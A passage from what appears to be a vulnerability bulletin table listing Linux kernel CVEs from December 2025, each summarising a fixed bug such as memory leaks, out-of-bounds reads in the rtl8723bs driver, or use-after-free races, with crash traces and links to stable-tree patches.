| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: netpoll: fix incorrect refcount handling causing incorrect cleanup commit efa95b01da18 ("netpoll: fix use after free") incorrectly ignored the refcount and prematurely set dev->npinfo to NULL during netpoll cleanup, leading to improper behavior and memory leaks. Scenario causing lack of proper cleanup: 1) A netpoll is associated with a NIC (e.g., eth0) and netdev->npinfo is allocated, and refcnt = 1 - Keep in mind that npinfo is shared among all netpoll instances. In this case, there is just one. 2) Another netpoll is also associated with the same NIC and npinfo->refcnt += 1. - Now dev->npinfo->refcnt = 2; - There is just one npinfo associated to the netdev. 3) When the first netpolls goes to clean up: - The first cleanup succeeds and clears np->dev->npinfo, ignoring refcnt. - It basically calls `RCU_INIT_POINTER(np->dev->npinfo, NULL);` - Set dev->npinfo = NULL, without proper cleanup - No ->ndo_netpoll_cleanup() is either called 4) Now the second target tries to clean up - The second cleanup fails because np->dev->npinfo is already NULL. * In this case, ops->ndo_netpoll_cleanup() was never called, and the skb pool is not cleaned as well (for the second netpoll instance) - This leaks npinfo and skbpool skbs, which is clearly reported by kmemleak. Revert commit efa95b01da18 ("netpoll: fix use after free") and adds clarifying comments emphasizing that npinfo cleanup should only happen once the refcount reaches zero, ensuring stable and correct netpoll behavior. | 2025-12-16 | not yet calculated | CVE-2025-68245 | https://git.kernel.org/stable/c/8e6a50edad11e3e1426e4c29e7aa6201f3468ac2 https://git.kernel.org/stable/c/9b0bb18b4b9dc017c1825a2c5e763615e34a1593 https://git.kernel.org/stable/c/890472d6fbf062e6de7fdd56642cb305ab79d669 https://git.kernel.org/stable/c/4afd4ebbad52aa146838ec23082ba393e426a2bb https://git.kernel.org/stable/c/c645693180a98606c430825223d2029315d85e9d https://git.kernel.org/stable/c/c79a6d9da29219616b118a3adce9a14cd30f9bd0 https://git.kernel.org/stable/c/9a51b5ccd1c79afec1c03a4e1e6688da52597556 https://git.kernel.org/stable/c/49c8d2c1f94cc2f4d1a108530d7ba52614b874c2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: close accepted socket when per-IP limit rejects connection When the per-IP connection limit is exceeded in ksmbd_kthread_fn(), the code sets ret = -EAGAIN and continues the accept loop without closing the just-accepted socket. That leaks one socket per rejected attempt from a single IP and enables a trivial remote DoS. Release client_sk before continuing. This bug was found with ZeroPath. | 2025-12-16 | not yet calculated | CVE-2025-68246 | https://git.kernel.org/stable/c/7a3c7154d5fc05956a8ad9e72ecf49e21555bfca https://git.kernel.org/stable/c/5746b2a0f5eb3d79667b3c51fe849bd62464220e https://git.kernel.org/stable/c/4587a7826be1ae0190dba10ff70b46bb0e3bc7d3 https://git.kernel.org/stable/c/35521b5a7e8a184548125f4530552101236dcda1 https://git.kernel.org/stable/c/98a5fd31cbf72d46bf18e50b3ab0ce86d5f319a9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: posix-timers: Plug potential memory leak in do_timer_create() When posix timer creation is set to allocate a given timer ID and the access to the user space value faults, the function terminates without freeing the already allocated posix timer structure. Move the allocation after the user space access to cure that. [ tglx: Massaged change log ] | 2025-12-16 | not yet calculated | CVE-2025-68247 | https://git.kernel.org/stable/c/f417f44524e7fc098e787c718d838b32723c0b2d https://git.kernel.org/stable/c/e0fd4d42e27f761e9cc82801b3f183e658dc749d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vmw_balloon: indicate success when effectively deflating during migration When migrating a balloon page, we first deflate the old page to then inflate the new page. However, if inflating the new page succeeded, we effectively deflated the old page, reducing the balloon size. In that case, the migration actually worked: similar to migrating+ immediately deflating the new page. The old page will be freed back to the buddy. Right now, the core will leave the page be marked as isolated (as we returned an error). When later trying to putback that page, we will run into the WARN_ON_ONCE() in balloon_page_putback(). That handling was changed in commit 3544c4faccb8 ("mm/balloon_compaction: stop using __ClearPageMovable()"); before that change, we would have tolerated that way of handling it. To fix it, let's just return 0 in that case, making the core effectively just clear the "isolated" flag + freeing it back to the buddy as if the migration succeeded. Note that the new page will also get freed when the core puts the last reference. Note that this also makes it all be more consistent: we will no longer unisolate the page in the balloon driver while keeping it marked as being isolated in migration core. This was found by code inspection. | 2025-12-16 | not yet calculated | CVE-2025-68248 | https://git.kernel.org/stable/c/aa05a044c5c2e147d726ac2fae1a97e0775eac11 https://git.kernel.org/stable/c/4ba5a8a7faa647ada8eae61a36517cf369f5bbe4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: most: usb: hdm_probe: Fix calling put_device() before device initialization The early error path in hdm_probe() can jump to err_free_mdev before &mdev->dev has been initialized with device_initialize(). Calling put_device(&mdev->dev) there triggers a device core WARN and ends up invoking kref_put(&kobj->kref, kobject_release) on an uninitialized kobject. In this path the private struct was only kmalloc'ed and the intended release is effectively kfree(mdev) anyway, so free it directly instead of calling put_device() on an uninitialized device. This removes the WARNING and fixes the pre-initialization error path. | 2025-12-16 | not yet calculated | CVE-2025-68249 | https://git.kernel.org/stable/c/3509c748e79435d09e730673c8c100b7f0ebc87c https://git.kernel.org/stable/c/ad2be44882716dc3589fbc5572cc13f88ead6b24 https://git.kernel.org/stable/c/c400410fe0580dd6118ae8d60287ac9ce71a65fd https://git.kernel.org/stable/c/6fb8fbc0aa542af5bf0fed94fa6b0edf18144f95 https://git.kernel.org/stable/c/7d851f746067b8ee5bac9c262f326ace0a6ea253 https://git.kernel.org/stable/c/4af0eedbdb4df7936bf43a28e31af232744d2620 https://git.kernel.org/stable/c/a8cc9e5fcb0e2eef21513a4fec888f5712cb8162 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hung_task: fix warnings caused by unaligned lock pointers The blocker tracking mechanism assumes that lock pointers are at least 4-byte aligned to use their lower bits for type encoding. However, as reported by Eero Tamminen, some architectures like m68k only guarantee 2-byte alignment of 32-bit values. This breaks the assumption and causes two related WARN_ON_ONCE checks to trigger. To fix this, the runtime checks are adjusted to silently ignore any lock that is not 4-byte aligned, effectively disabling the feature in such cases and avoiding the related warnings. Thanks to Geert Uytterhoeven for bisecting! | 2025-12-16 | not yet calculated | CVE-2025-68250 | https://git.kernel.org/stable/c/c0e2dcbe54cb15ecdf9d8f4501c6720423243888 https://git.kernel.org/stable/c/c97513cddcfc235f2522617980838e500af21d01 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: avoid infinite loops due to corrupted subpage compact indexes Robert reported an infinite loop observed by two crafted images. The root cause is that `clusterofs` can be larger than `lclustersize` for !NONHEAD `lclusters` in corrupted subpage compact indexes, e.g.: blocksize = lclustersize = 512 lcn = 6 clusterofs = 515 Move the corresponding check for full compress indexes to `z_erofs_load_lcluster_from_disk()` to also cover subpage compact compress indexes. It also fixes the position of `m->type >= Z_EROFS_LCLUSTER_TYPE_MAX` check, since it should be placed right after `z_erofs_load_{compact,full}_lcluster()`. | 2025-12-16 | not yet calculated | CVE-2025-68251 | https://git.kernel.org/stable/c/8675447a8794983f2b7e694b378112772c17635e https://git.kernel.org/stable/c/e13d315ae077bb7c3c6027cc292401bc0f4ec683 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: misc: fastrpc: Fix dma_buf object leak in fastrpc_map_lookup In fastrpc_map_lookup, dma_buf_get is called to obtain a reference to the dma_buf for comparison purposes. However, this reference is never released when the function returns, leading to a dma_buf memory leak. Fix this by adding dma_buf_put before returning from the function, ensuring that the temporarily acquired reference is properly released regardless of whether a matching map is found. Rule: add | 2025-12-16 | not yet calculated | CVE-2025-68252 | https://git.kernel.org/stable/c/c2fef5ebb73f3dabae6fbc571d181914ed32c483 https://git.kernel.org/stable/c/9a297a68c3ba4a7ecb31ed52f61bd6634abb79d3 https://git.kernel.org/stable/c/e17b13387827adce7acb19ac0f07f9bcafe0ff4c https://git.kernel.org/stable/c/214e81a63a9aa0be42382ef0365ba5ed32c513ab https://git.kernel.org/stable/c/fff111bf45cbeeb659324316d68554e35d350092 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm: don't spin in add_stack_record when gfp flags don't allow syzbot was able to find the following path: add_stack_record_to_list mm/page_owner.c:182 [inline] inc_stack_record_count mm/page_owner.c:214 [inline] __set_page_owner+0x2c3/0x4a0 mm/page_owner.c:333 set_page_owner include/linux/page_owner.h:32 [inline] post_alloc_hook+0x240/0x2a0 mm/page_alloc.c:1851 prep_new_page mm/page_alloc.c:1859 [inline] get_page_from_freelist+0x21e4/0x22c0 mm/page_alloc.c:3858 alloc_pages_nolock_noprof+0x94/0x120 mm/page_alloc.c:7554 Don't spin in add_stack_record_to_list() when it is called from *_nolock() context. | 2025-12-16 | not yet calculated | CVE-2025-68253 | https://git.kernel.org/stable/c/504174133453e3af73e626e328603d7eb5986f34 https://git.kernel.org/stable/c/c83aab85e18103a6dc066b4939e2c92a02bb1b05 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: rtl8723bs: fix out-of-bounds read in OnBeacon ESR IE parsing The Extended Supported Rates (ESR) IE handling in OnBeacon accessed *(p + 1 + ielen) and *(p + 2 + ielen) without verifying that these offsets lie within the received frame buffer. A malformed beacon with an ESR IE positioned at the end of the buffer could cause an out-of-bounds read, potentially triggering a kernel panic. Add a boundary check to ensure that the ESR IE body and the subsequent bytes are within the limits of the frame before attempting to access them. This prevents OOB reads caused by malformed beacon frames. | 2025-12-16 | not yet calculated | CVE-2025-68254 | https://git.kernel.org/stable/c/d1ab7f9cee22e7b8a528da9ac953e4193b96cda5 https://git.kernel.org/stable/c/38292407c2bb5b2b3131aaace4ecc7a829b40b76 https://git.kernel.org/stable/c/bf323db1d883c209880bd92f3b12503e3531c3fc https://git.kernel.org/stable/c/502ddcc405b69fa92e0add6c1714d654504f6fd7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: rtl8723bs: fix stack buffer overflow in OnAssocReq IE parsing The Supported Rates IE length from an incoming Association Request frame was used directly as the memcpy() length when copying into a fixed-size 16-byte stack buffer (supportRate). A malicious station can advertise an IE length larger than 16 bytes, causing a stack buffer overflow. Clamp ie_len to the buffer size before copying the Supported Rates IE, and correct the bounds check when merging Extended Supported Rates to prevent a second potential overflow. This prevents kernel stack corruption triggered by malformed association requests. | 2025-12-16 | not yet calculated | CVE-2025-68255 | https://git.kernel.org/stable/c/61871c83259a511980ec2664964cecc69005398b https://git.kernel.org/stable/c/25411f5fcf5743131158f337c99c2bbf3f8477f5 https://git.kernel.org/stable/c/e841d8ea722315b781c4fc5bf4f7670fbca88875 https://git.kernel.org/stable/c/6ef0e1c10455927867cac8f0ed6b49f328f8cf95 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: rtl8723bs: fix out-of-bounds read in rtw_get_ie() parser The Information Element (IE) parser rtw_get_ie() trusted the length byte of each IE without validating that the IE body (len bytes after the 2-byte header) fits inside the remaining frame buffer. A malformed frame can advertise an IE length larger than the available data, causing the parser to increment its pointer beyond the buffer end. This results in out-of-bounds reads or, depending on the pattern, an infinite loop. Fix by validating that (offset + 2 + len) does not exceed the limit before accepting the IE or advancing to the next element. This prevents OOB reads and ensures the parser terminates safely on malformed frames. | 2025-12-16 | not yet calculated | CVE-2025-68256 | https://git.kernel.org/stable/c/a54e2b2db1b7de2e008b4f62eec35aaefcc663c5 https://git.kernel.org/stable/c/df191dd9f4c7249d98ada55634fa8ac19089b8cb https://git.kernel.org/stable/c/c0d93d69e1472ba75b78898979b90a98ba2a2501 https://git.kernel.org/stable/c/154828bf9559b9c8421fc2f0d7f7f76b3683aaed |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: comedi: check device's attached status in compat ioctls Syzbot identified an issue [1] that crashes kernel, seemingly due to unexistent callback dev->get_valid_routes(). By all means, this should not occur as said callback must always be set to get_zero_valid_routes() in __comedi_device_postconfig(). As the crash seems to appear exclusively in i386 kernels, at least, judging from [1] reports, the blame lies with compat versions of standard IOCTL handlers. Several of them are modified and do not use comedi_unlocked_ioctl(). While functionality of these ioctls essentially copy their original versions, they do not have required sanity check for device's attached status. This, in turn, leads to a possibility of calling select IOCTLs on a device that has not been properly setup, even via COMEDI_DEVCONFIG. Doing so on unconfigured devices means that several crucial steps are missed, for instance, specifying dev->get_valid_routes() callback. Fix this somewhat crudely by ensuring device's attached status before performing any ioctls, improving logic consistency between modern and compat functions. [1] Syzbot report: BUG: kernel NULL pointer dereference, address: 0000000000000000 ... CR2: ffffffffffffffd6 CR3: 000000006c717000 CR4: 0000000000352ef0 Call Trace: <TASK> get_valid_routes drivers/comedi/comedi_fops.c:1322 [inline] parse_insn+0x78c/0x1970 drivers/comedi/comedi_fops.c:1401 do_insnlist_ioctl+0x272/0x700 drivers/comedi/comedi_fops.c:1594 compat_insnlist drivers/comedi/comedi_fops.c:3208 [inline] comedi_compat_ioctl+0x810/0x990 drivers/comedi/comedi_fops.c:3273 __do_compat_sys_ioctl fs/ioctl.c:695 [inline] __se_compat_sys_ioctl fs/ioctl.c:638 [inline] __ia32_compat_sys_ioctl+0x242/0x370 fs/ioctl.c:638 do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline] ... | 2025-12-16 | not yet calculated | CVE-2025-68257 | https://git.kernel.org/stable/c/f6e629dfe6f590091c662a87c9fcf118b1c1c7dc https://git.kernel.org/stable/c/573b07d2e3d473ee7eb625ef87519922cf01168d https://git.kernel.org/stable/c/aac80e912de306815297a3b74f0426873ffa7dc3 https://git.kernel.org/stable/c/0de7d9cd07a2671fa6089173bccc0b2afe6b93ee |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: comedi: multiq3: sanitize config options in multiq3_attach() Syzbot identified an issue [1] in multiq3_attach() that induces a task timeout due to open() or COMEDI_DEVCONFIG ioctl operations, specifically, in the case of multiq3 driver. This problem arose when syzkaller managed to craft weird configuration options used to specify the number of channels in encoder subdevice. If a particularly great number is passed to s->n_chan in multiq3_attach() via it->options[2], then multiple calls to multiq3_encoder_reset() at the end of driver-specific attach() method will be running for minutes, thus blocking tasks and affected devices as well. While this issue is most likely not too dangerous for real-life devices, it still makes sense to sanitize configuration inputs. Enable a sensible limit on the number of encoder chips (4 chips max, each with 2 channels) to stop this behaviour from manifesting. [1] Syzbot crash: INFO: task syz.2.19:6067 blocked for more than 143 seconds. ... Call Trace: <TASK> context_switch kernel/sched/core.c:5254 [inline] __schedule+0x17c4/0x4d60 kernel/sched/core.c:6862 __schedule_loop kernel/sched/core.c:6944 [inline] schedule+0x165/0x360 kernel/sched/core.c:6959 schedule_preempt_disabled+0x13/0x30 kernel/sched/core.c:7016 __mutex_lock_common kernel/locking/mutex.c:676 [inline] __mutex_lock+0x7e6/0x1350 kernel/locking/mutex.c:760 comedi_open+0xc0/0x590 drivers/comedi/comedi_fops.c:2868 chrdev_open+0x4cc/0x5e0 fs/char_dev.c:414 do_dentry_open+0x953/0x13f0 fs/open.c:965 vfs_open+0x3b/0x340 fs/open.c:1097 ... | 2025-12-16 | not yet calculated | CVE-2025-68258 | https://git.kernel.org/stable/c/8952bc1973cd54158c35e06bfb8c29ace7375a48 https://git.kernel.org/stable/c/8dc2f02d3bada9247f00bfd2e5f61f68c389a0a3 https://git.kernel.org/stable/c/543f4c380c2e1f35e60528df7cb54705cda7fee3 https://git.kernel.org/stable/c/f24c6e3a39fa355dabfb684c9ca82db579534e72 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: SVM: Don't skip unrelated instruction if INT3/INTO is replaced When re-injecting a soft interrupt from an INT3, INT0, or (select) INTn instruction, discard the exception and retry the instruction if the code stream is changed (e.g. by a different vCPU) between when the CPU executes the instruction and when KVM decodes the instruction to get the next RIP. As effectively predicted by commit 6ef88d6e36c2 ("KVM: SVM: Re-inject INT3/INTO instead of retrying the instruction"), failure to verify that the correct INTn instruction was decoded can effectively clobber guest state due to decoding the wrong instruction and thus specifying the wrong next RIP. The bug most often manifests as "Oops: int3" panics on static branch checks in Linux guests. Enabling or disabling a static branch in Linux uses the kernel's "text poke" code patching mechanism. To modify code while other CPUs may be executing that code, Linux (temporarily) replaces the first byte of the original instruction with an int3 (opcode 0xcc), then patches in the new code stream except for the first byte, and finally replaces the int3 with the first byte of the new code stream. If a CPU hits the int3, i.e. executes the code while it's being modified, then the guest kernel must look up the RIP to determine how to handle the #BP, e.g. by emulating the new instruction. If the RIP is incorrect, then this lookup fails and the guest kernel panics. The bug reproduces almost instantly by hacking the guest kernel to repeatedly check a static branch[1] while running a drgn script[2] on the host to constantly swap out the memory containing the guest's TSS. [1]: https://gist.github.com/osandov/44d17c51c28c0ac998ea0334edf90b5a [2]: https://gist.github.com/osandov/10e45e45afa29b11e0c7209247afc00b | 2025-12-16 | not yet calculated | CVE-2025-68259 | https://git.kernel.org/stable/c/87cc1622c88a4888959d64fa1fc9ba1e264aa3d4 https://git.kernel.org/stable/c/54bcccc2c7805a00af1d7d2faffd6f424c0133aa https://git.kernel.org/stable/c/53903ac9ca1abffa27327e85075ec496fa55ccf3 https://git.kernel.org/stable/c/4da3768e1820cf15cced390242d8789aed34f54d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rust_binder: fix race condition on death_list Rust Binder contains the following unsafe operation: // SAFETY: A `NodeDeath` is never inserted into the death list // of any node other than its owner, so it is either in this // death list or in no death list. unsafe { node_inner.death_list.remove(self) }; This operation is unsafe because when touching the prev/next pointers of a list element, we have to ensure that no other thread is also touching them in parallel. If the node is present in the list that `remove` is called on, then that is fine because we have exclusive access to that list. If the node is not in any list, then it's also ok. But if it's present in a different list that may be accessed in parallel, then that may be a data race on the prev/next pointers. And unfortunately that is exactly what is happening here. In Node::release, we: 1. Take the lock. 2. Move all items to a local list on the stack. 3. Drop the lock. 4. Iterate the local list on the stack. Combined with threads using the unsafe remove method on the original list, this leads to memory corruption of the prev/next pointers. This leads to crashes like this one: Unable to handle kernel paging request at virtual address 000bb9841bcac70e Mem abort info: ESR = 0x0000000096000044 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x04: level 0 translation fault Data abort info: ISV = 0, ISS = 0x00000044, ISS2 = 0x00000000 CM = 0, WnR = 1, TnD = 0, TagAccess = 0 GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 [000bb9841bcac70e] address between user and kernel address ranges Internal error: Oops: 0000000096000044 [#1] PREEMPT SMP google-cdd 538c004.gcdd: context saved(CPU:1) item - log_kevents is disabled Modules linked in: ... rust_binder CPU: 1 UID: 0 PID: 2092 Comm: kworker/1:178 Tainted: G S W OE 6.12.52-android16-5-g98debd5df505-4k #1 f94a6367396c5488d635708e43ee0c888d230b0b Tainted: [S]=CPU_OUT_OF_SPEC, [W]=WARN, [O]=OOT_MODULE, [E]=UNSIGNED_MODULE Hardware name: MUSTANG PVT 1.0 based on LGA (DT) Workqueue: events _RNvXs6_NtCsdfZWD8DztAw_6kernel9workqueueINtNtNtB7_4sync3arc3ArcNtNtCs8QPsHWIn21X_16rust_binder_main7process7ProcessEINtB5_15WorkItemPointerKy0_E3runB13_ [rust_binder] pstate: 23400005 (nzCv daif +PAN -UAO +TCO +DIT -SSBS BTYPE=--) pc : _RNvXs3_NtCs8QPsHWIn21X_16rust_binder_main7processNtB5_7ProcessNtNtCsdfZWD8DztAw_6kernel9workqueue8WorkItem3run+0x450/0x11f8 [rust_binder] lr : _RNvXs3_NtCs8QPsHWIn21X_16rust_binder_main7processNtB5_7ProcessNtNtCsdfZWD8DztAw_6kernel9workqueue8WorkItem3run+0x464/0x11f8 [rust_binder] sp : ffffffc09b433ac0 x29: ffffffc09b433d30 x28: ffffff8821690000 x27: ffffffd40cbaa448 x26: ffffff8821690000 x25: 00000000ffffffff x24: ffffff88d0376578 x23: 0000000000000001 x22: ffffffc09b433c78 x21: ffffff88e8f9bf40 x20: ffffff88e8f9bf40 x19: ffffff882692b000 x18: ffffffd40f10bf00 x17: 00000000c006287d x16: 00000000c006287d x15: 00000000000003b0 x14: 0000000000000100 x13: 000000201cb79ae0 x12: fffffffffffffff0 x11: 0000000000000000 x10: 0000000000000001 x9 : 0000000000000000 x8 : b80bb9841bcac706 x7 : 0000000000000001 x6 : fffffffebee63f30 x5 : 0000000000000000 x4 : 0000000000000001 x3 : 0000000000000000 x2 : 0000000000004c31 x1 : ffffff88216900c0 x0 : ffffff88e8f9bf00 Call trace: _RNvXs3_NtCs8QPsHWIn21X_16rust_binder_main7processNtB5_7ProcessNtNtCsdfZWD8DztAw_6kernel9workqueue8WorkItem3run+0x450/0x11f8 [rust_binder bbc172b53665bbc815363b22e97e3f7e3fe971fc] process_scheduled_works+0x1c4/0x45c worker_thread+0x32c/0x3e8 kthread+0x11c/0x1c8 ret_from_fork+0x10/0x20 Code: 94218d85 b4000155 a94026a8 d10102a0 (f9000509) ---[ end trace 0000000000000000 ]--- Thus, modify Node::release to pop items directly off the original list. | 2025-12-16 | not yet calculated | CVE-2025-68260 | https://git.kernel.org/stable/c/3428831264096d32f830a7fcfc7885dd263e511a https://git.kernel.org/stable/c/3e0ae02ba831da2b707905f4e602e43f8507b8cc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() Fix a race between inline data destruction and block mapping. The function ext4_destroy_inline_data_nolock() changes the inode data layout by clearing EXT4_INODE_INLINE_DATA and setting EXT4_INODE_EXTENTS. At the same time, another thread may execute ext4_map_blocks(), which tests EXT4_INODE_EXTENTS to decide whether to call ext4_ext_map_blocks() or ext4_ind_map_blocks(). Without i_data_sem protection, ext4_ind_map_blocks() may receive inode with EXT4_INODE_EXTENTS flag and triggering assert. kernel BUG at fs/ext4/indirect.c:546! EXT4-fs (loop2): unmounting filesystem. invalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014 RIP: 0010:ext4_ind_map_blocks.cold+0x2b/0x5a fs/ext4/indirect.c:546 Call Trace: <TASK> ext4_map_blocks+0xb9b/0x16f0 fs/ext4/inode.c:681 _ext4_get_block+0x242/0x590 fs/ext4/inode.c:822 ext4_block_write_begin+0x48b/0x12c0 fs/ext4/inode.c:1124 ext4_write_begin+0x598/0xef0 fs/ext4/inode.c:1255 ext4_da_write_begin+0x21e/0x9c0 fs/ext4/inode.c:3000 generic_perform_write+0x259/0x5d0 mm/filemap.c:3846 ext4_buffered_write_iter+0x15b/0x470 fs/ext4/file.c:285 ext4_file_write_iter+0x8e0/0x17f0 fs/ext4/file.c:679 call_write_iter include/linux/fs.h:2271 [inline] do_iter_readv_writev+0x212/0x3c0 fs/read_write.c:735 do_iter_write+0x186/0x710 fs/read_write.c:861 vfs_iter_write+0x70/0xa0 fs/read_write.c:902 iter_file_splice_write+0x73b/0xc90 fs/splice.c:685 do_splice_from fs/splice.c:763 [inline] direct_splice_actor+0x10f/0x170 fs/splice.c:950 splice_direct_to_actor+0x33a/0xa10 fs/splice.c:896 do_splice_direct+0x1a9/0x280 fs/splice.c:1002 do_sendfile+0xb13/0x12c0 fs/read_write.c:1255 __do_sys_sendfile64 fs/read_write.c:1323 [inline] __se_sys_sendfile64 fs/read_write.c:1309 [inline] __x64_sys_sendfile64+0x1cf/0x210 fs/read_write.c:1309 do_syscall_x64 arch/x86/entry/common.c:51 [inline] do_syscall_64+0x35/0x80 arch/x86/entry/common.c:81 entry_SYSCALL_64_after_hwframe+0x6e/0xd8 | 2025-12-16 | not yet calculated | CVE-2025-68261 | https://git.kernel.org/stable/c/22a76b0861ae61a299c8e126c1aca8c4fda820fd https://git.kernel.org/stable/c/ba8aeff294ac7ff6dfe293663d815c54c5ee218c https://git.kernel.org/stable/c/5cad18e527ba8a9ca5463cc170073eeb5a4826f4 https://git.kernel.org/stable/c/0cd8feea8777f8d9b9a862b89c688b049a5c8475 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: zstd - fix double-free in per-CPU stream cleanup The crypto/zstd module has a double-free bug that occurs when multiple tfms are allocated and freed. The issue happens because zstd_streams (per-CPU contexts) are freed in zstd_exit() during every tfm destruction, rather than being managed at the module level. When multiple tfms exist, each tfm exit attempts to free the same shared per-CPU streams, resulting in a double-free. This leads to a stack trace similar to: BUG: Bad page state in process kworker/u16:1 pfn:106fd93 page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x106fd93 flags: 0x17ffffc0000000(node=0|zone=2|lastcpupid=0x1fffff) page_type: 0xffffffff() raw: 0017ffffc0000000 dead000000000100 dead000000000122 0000000000000000 raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000 page dumped because: nonzero entire_mapcount Modules linked in: ... CPU: 3 UID: 0 PID: 2506 Comm: kworker/u16:1 Kdump: loaded Tainted: G B Hardware name: ... Workqueue: btrfs-delalloc btrfs_work_helper Call Trace: <TASK> dump_stack_lvl+0x5d/0x80 bad_page+0x71/0xd0 free_unref_page_prepare+0x24e/0x490 free_unref_page+0x60/0x170 crypto_acomp_free_streams+0x5d/0xc0 crypto_acomp_exit_tfm+0x23/0x50 crypto_destroy_tfm+0x60/0xc0 ... Change the lifecycle management of zstd_streams to free the streams only once during module cleanup. | 2025-12-16 | not yet calculated | CVE-2025-68262 | https://git.kernel.org/stable/c/dc0f4509b0ed5d82bef78e058db0ac4df04d0695 https://git.kernel.org/stable/c/e983feaa79de1e46c9087fb9f02fedb0e5397ce6 https://git.kernel.org/stable/c/48bc9da3c97c15f1ea24934bcb3b736acd30163d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: ipc: fix use-after-free in ipc_msg_send_request ipc_msg_send_request() waits for a generic netlink reply using an ipc_msg_table_entry on the stack. The generic netlink handler (handle_generic_event()/handle_response()) fills entry->response under ipc_msg_table_lock, but ipc_msg_send_request() used to validate and free entry->response without holding the same lock. Under high concurrency this allows a race where handle_response() is copying data into entry->response while ipc_msg_send_request() has just freed it, leading to a slab-use-after-free reported by KASAN in handle_generic_event(): BUG: KASAN: slab-use-after-free in handle_generic_event+0x3c4/0x5f0 [ksmbd] Write of size 12 at addr ffff888198ee6e20 by task pool/109349 ... Freed by task: kvfree ipc_msg_send_request [ksmbd] ksmbd_rpc_open -> ksmbd_session_rpc_open [ksmbd] Fix by: - Taking ipc_msg_table_lock in ipc_msg_send_request() while validating entry->response, freeing it when invalid, and removing the entry from ipc_msg_table. - Returning the final entry->response pointer to the caller only after the hash entry is removed under the lock. - Returning NULL in the error path, preserving the original API semantics. This makes all accesses to entry->response consistent with handle_response(), which already updates and fills the response buffer under ipc_msg_table_lock, and closes the race that allowed the UAF. | 2025-12-16 | not yet calculated | CVE-2025-68263 | https://git.kernel.org/stable/c/5ac763713a1ef8f9a8bda1dbd81f0318d67baa4e https://git.kernel.org/stable/c/759c8c30cfa8706c518e56f67971b1f0932f4b9b https://git.kernel.org/stable/c/8229c6ca50cea701e25a7ee25f48441b582ec5fa https://git.kernel.org/stable/c/1fab1fa091f5aa97265648b53ea031deedd26235 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: refresh inline data size before write operations The cached ei->i_inline_size can become stale between the initial size check and when ext4_update_inline_data()/ext4_create_inline_data() use it. Although ext4_get_max_inline_size() reads the correct value at the time of the check, concurrent xattr operations can modify i_inline_size before ext4_write_lock_xattr() is acquired. This causes ext4_update_inline_data() and ext4_create_inline_data() to work with stale capacity values, leading to a BUG_ON() crash in ext4_write_inline_data(): kernel BUG at fs/ext4/inline.c:1331! BUG_ON(pos + len > EXT4_I(inode)->i_inline_size); The race window: 1. ext4_get_max_inline_size() reads i_inline_size = 60 (correct) 2. Size check passes for 50-byte write 3. [Another thread adds xattr, i_inline_size changes to 40] 4. ext4_write_lock_xattr() acquires lock 5. ext4_update_inline_data() uses stale i_inline_size = 60 6. Attempts to write 50 bytes but only 40 bytes actually available 7. BUG_ON() triggers Fix this by recalculating i_inline_size via ext4_find_inline_data_nolock() immediately after acquiring xattr_sem. This ensures ext4_update_inline_data() and ext4_create_inline_data() work with current values that are protected from concurrent modifications. This is similar to commit a54c4613dac1 ("ext4: fix race writing to an inline_data file while its xattrs are changing") which fixed i_inline_off staleness. This patch addresses the related i_inline_size staleness issue. | 2025-12-16 | not yet calculated | CVE-2025-68264 | https://git.kernel.org/stable/c/210ac60a86a3ad2c76ae60e0dc71c34af6e7ea0b https://git.kernel.org/stable/c/ca43ea29b4c4d2764aec8a26cffcfb677a871e6e https://git.kernel.org/stable/c/58df743faf21ceb1880f930aa5dd428e2a5e415d https://git.kernel.org/stable/c/892e1cf17555735e9d021ab036c36bc7b58b0e3b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvme: fix admin request_queue lifetime The namespaces can access the controller's admin request_queue, and stale references on the namespaces may exist after tearing down the controller. Ensure the admin request_queue is active by moving the controller's 'put' to after all controller references have been released to ensure no one is can access the request_queue. This fixes a reported use-after-free bug: BUG: KASAN: slab-use-after-free in blk_queue_enter+0x41c/0x4a0 Read of size 8 at addr ffff88c0a53819f8 by task nvme/3287 CPU: 67 UID: 0 PID: 3287 Comm: nvme Tainted: G E 6.13.2-ga1582f1a031e #15 Tainted: [E]=UNSIGNED_MODULE Hardware name: Jabil /EGS 2S MB1, BIOS 1.00 06/18/2025 Call Trace: <TASK> dump_stack_lvl+0x4f/0x60 print_report+0xc4/0x620 ? _raw_spin_lock_irqsave+0x70/0xb0 ? _raw_read_unlock_irqrestore+0x30/0x30 ? blk_queue_enter+0x41c/0x4a0 kasan_report+0xab/0xe0 ? blk_queue_enter+0x41c/0x4a0 blk_queue_enter+0x41c/0x4a0 ? __irq_work_queue_local+0x75/0x1d0 ? blk_queue_start_drain+0x70/0x70 ? irq_work_queue+0x18/0x20 ? vprintk_emit.part.0+0x1cc/0x350 ? 